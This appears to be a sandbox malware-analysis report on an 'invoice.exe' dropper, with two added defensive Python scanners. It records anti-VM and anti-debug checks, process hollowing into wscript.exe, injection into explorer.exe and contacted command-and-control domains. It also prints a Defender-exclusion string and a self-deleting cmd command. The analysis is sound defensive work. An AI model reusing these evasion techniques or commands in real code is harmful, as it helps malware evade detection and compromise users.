          Source: C:\Users\user\Desktop\invoice.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000021B85F4 second address: 00000000021B85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000021B898E second address: 0000000000021B8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004088C0 rdtsc
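All four interceptor hits have the same shape: rdtsc, xor ecx, ecx, add ecx, eax, rdtsc, with the second rdtsc six bytes after the first (0x4085F4 to 0x4085FA). That is the classic timestamp-delta check: the code reads the counter twice and compares the gap, which is far larger under a hypervisor or single-stepping debugger than on bare metal. The same two checks sit at offset 0x85F4 and 0x898E in both the 0x400000 image of PID 3 and the 0x21B0000 region of wscript.exe, i.e. the same unpacked payload relocated into the injected process, which is also the region the Yara matches above flag. The block below is an added example, not code from the report: a byte-level scanner that finds RDTSC opcodes and pairs the ones that sit a few bytes apart. The sample blob is constructed, the encodings assumed for the xor and add are 31 C9 and 01 C1, and 0F 31 can occur inside data or other instructions, so the short pairing window is what keeps the noise down; a disassembler gives the authoritative answer. Run it against the unpacked dump (3.2.invoice.exe.400000.0.unpack), not the packed .NET dropper, whose .text section has an entropy of 7.55 and will not contain the check in plain form.

```python
# Added example (not part of the report): scan raw code bytes for the
# back-to-back RDTSC pattern the interceptor reported. The sample bytes
# are constructed; the encodings of "xor ecx, ecx" (31 C9) and
# "add ecx, eax" (01 C1) are assumptions.
from typing import List, Tuple

RDTSC = b"\x0f\x31"  # opcode of RDTSC

# Constructed blob: one real timing check (two RDTSC six bytes apart),
# then two isolated RDTSC far apart that must not be paired.
SAMPLE = (
    b"\x90" * 4
    + b"\x0f\x31" + b"\x31\xc9" + b"\x01\xc1" + b"\x0f\x31"
    + b"\x90" * 40
    + b"\x0f\x31"
    + b"\x90" * 64
    + b"\x0f\x31"
)


def find_rdtsc(data: bytes) -> List[int]:
    """Offsets of every 0F 31 byte pair in data (may include false hits)."""
    offsets: List[int] = []
    i = data.find(RDTSC)
    while i != -1:
        offsets.append(i)
        i = data.find(RDTSC, i + 1)
    return offsets


def rdtsc_pairs(data: bytes, base: int = 0,
                max_gap: int = 32) -> List[Tuple[int, int]]:
    """Consecutive RDTSC hits no more than max_gap bytes apart, reported
    as virtual addresses relative to base, in the order they occur."""
    offs = find_rdtsc(data)
    return [(base + a, base + b)
            for a, b in zip(offs, offs[1:]) if b - a <= max_gap]


if __name__ == "__main__":
    # With the blob placed at 0x4085F0 the pair lands on the addresses
    # the interceptor reported for PID 3.
    for first, second in rdtsc_pairs(SAMPLE, base=0x4085F0):
        print(f"timing check: first {first:#010x} second {second:#010x}")
```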
          Source: C:\Users\user\Desktop\invoice.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\invoice.exe TID: 4228 Thread sleep time: -99765s >= -30000s
          Source: C:\Users\user\Desktop\invoice.exe TID: 2244 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6412 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 6336 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\invoice.exe Thread delayed: delay time: 99765
          Source: C:\Users\user\Desktop\invoice.exe Thread delayed: delay time: 922337203685477
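The delay values deserve a second look. 922337203685477 is not an arbitrary number: NtDelayExecution takes a relative interval in 100 ns ticks, and INT64_MAX divided by 10000 is exactly 922337203685477, so thread 2244 asked for the longest sleep the kernel can represent, a sleep that never returns. A sandbox that does not skip or shorten such delays never reaches the payload, which is why the report counts it as evasion rather than as a bug. The other values (99765, 40000, 44000) cross the 30000 threshold the report prints but stay under its 3 minute "long sleeps" cut-off. The block below is an added example, not from the report: a classifier for these lines that separates the INT64_MAX sentinel from ordinary long sleeps. It assumes the figures are milliseconds even though the report prints an "s" suffix; the lines are copied from above.

```python
# Added example (not part of the report): classify the "Thread sleep
# time" evidence lines. Assumption: the figures are milliseconds although
# the report prints an "s" suffix. The lines are copied from the report.
import re
from typing import Dict, List

INT64_MAX = (1 << 63) - 1
# NtDelayExecution takes a relative interval in 100 ns ticks. The largest
# interval that fits in an int64, converted to milliseconds, is exactly
# the 922337203685477 that appears in the report.
MAX_DELAY_MS = INT64_MAX // 10_000

LINES = r"""
Source: C:\Users\user\Desktop\invoice.exe TID: 4228 Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\Desktop\invoice.exe TID: 2244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6412 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 6336 Thread sleep time: -44000s >= -30000s
"""

ROW = re.compile(
    r"Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: "
    r"-(?P<ms>\d+)s >= -(?P<threshold>\d+)s"
)


def classify(line: str, long_ms: int = 180_000) -> Dict[str, object]:
    """Parse one evidence line and attach a verdict.

    max_int64_delay: the longest interval the kernel can represent,
                     i.e. the thread will never wake up on its own
    long_sleep:      at or above long_ms (3 min, the report's own cut-off)
    evasive_sleep:   at or above the threshold printed in the line
    normal:          anything shorter
    """
    m = ROW.search(line)
    if m is None:
        raise ValueError(f"unrecognised line: {line!r}")
    ms, threshold = int(m["ms"]), int(m["threshold"])
    if ms == MAX_DELAY_MS:
        verdict = "max_int64_delay"
    elif ms >= long_ms:
        verdict = "long_sleep"
    elif ms >= threshold:
        verdict = "evasive_sleep"
    else:
        verdict = "normal"
    return {
        "process": m["proc"].rsplit("\\", 1)[-1],
        "tid": int(m["tid"]),
        "ms": ms,
        "verdict": verdict,
    }


def summarise(text: str) -> List[Dict[str, object]]:
    """Classify every non-empty line of a report excerpt."""
    return [classify(line) for line in text.strip().splitlines()
            if line.strip()]


if __name__ == "__main__":
    for row in summarise(LINES):
        print(f"{row['process']:<14} tid={row['tid']:<5} "
              f"{row['ms']:>16} ms  {row['verdict']}")
```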
          Source: explorer.exe, 00000004.00000000.269061528.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.251045811.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.246647210.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.269121644.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.260341050.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.269121644.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.268510649.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\invoice.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeCode function: 3_2_00409B30 LdrLoadDll,
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046FC450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E6C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04721C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0473740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047214FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E6CF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468C577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04687D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04694D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04673D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046EA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04718DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467D5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472FDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E6DC9 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04691DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047305AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04662D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469FD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468AE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04677E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472AE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0471FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466C600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04698E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469A61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04721608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046776E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046916E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046936CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0471FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04730EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046FFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04664F2E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469A70E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0473070D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046FFF10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04678794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E7794 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04722073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04731074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04680050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04734015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E7016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046658EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046FB8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046FB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046920A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469F0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04669080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E3884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04684120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04684120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04669100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046F41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046961A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0471B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04669240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046F4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A4A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04678A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04683A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04665210 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04665210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046652A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467AAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469D294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04693B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04738B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0468DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046903E2 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046E53CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04694BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04735BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04671B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0471D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.highdeserthealthinsurance.com
Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.64 80
Source: C:\Windows\explorer.exe | Domain query: www.dateyourlovelive.club
Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe | Domain query: www.legacyadmin.support
Source: C:\Windows\explorer.exe | Domain query: www.gunungbatufrozen.com
Source: C:\Windows\explorer.exe | Domain query: www.hotelmaktub.com
Source: C:\Windows\explorer.exe | Domain query: www.flowhcf.com
Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.24 80
Source: C:\Windows\explorer.exe | Domain query: www.sookepointcargo.com
Source: C:\Windows\explorer.exe | Domain query: www.jinlan.online
Source: C:\Windows\explorer.exe | Domain query: www.armaccountingbs.com
Source: C:\Windows\explorer.exe | Network Connect: 35.156.117.131 80
Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.91 80
Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
Source: C:\Windows\explorer.exe | Domain query: www.zmid.xyz
Source: C:\Windows\explorer.exe | Network Connect: 177.55.108.130 80
Source: C:\Windows\explorer.exe | Domain query: www.knoxvilleoutdoorkitchens.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\invoice.exe | Memory written: C:\Users\user\Desktop\invoice.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\invoice.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\invoice.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\invoice.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: E0000
Source: C:\Users\user\Desktop\invoice.exe | Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
Source: explorer.exe, 00000004.00000000.261500352.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.491483323.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.490705196.0000000002EE0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
